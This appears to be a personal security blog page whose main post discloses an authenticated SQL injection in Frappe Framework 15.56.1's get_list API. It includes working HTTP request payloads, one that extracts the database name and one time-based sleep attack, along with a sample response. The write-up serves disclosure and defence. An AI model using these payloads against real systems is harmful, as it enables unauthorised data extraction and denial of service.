Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

Frappe Framework 15.56.1 SQL Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 96
An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API of the Frappe Framework, affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields[] parameter, which allows low-privileged users to inject arbitrary SQL expressions directly into the SELECT clause.

Sample Structured Query Language Injection:

Request:

GET /api/method/frappe.desk.reportview.get_list?fields=%5B%22salary_component_abbr%2c(SELECT%20database())%20AS%20current_db%22%5D&doctype=Salary%20Component&limit=20&_=1748066407934 HTTP/2
Host: --host--
Cookie: ******
--snip--

Response:

HTTP/2 200 OK

{"message":[{"salary_component_abbr":"H***","current_db":"_**************"},
--snip--

Time based attack:

Request

GET /api/method/frappe.desk.reportview.get_list?fields=[%22salary_component_abbr%2c(select*from(select(sleep(200)))a)%22]&doctype=Salary%20Component&limit=20&_=1748066407933 HTTP/2
Host: --host--
Cookie: ******
--snip--
Social Media Share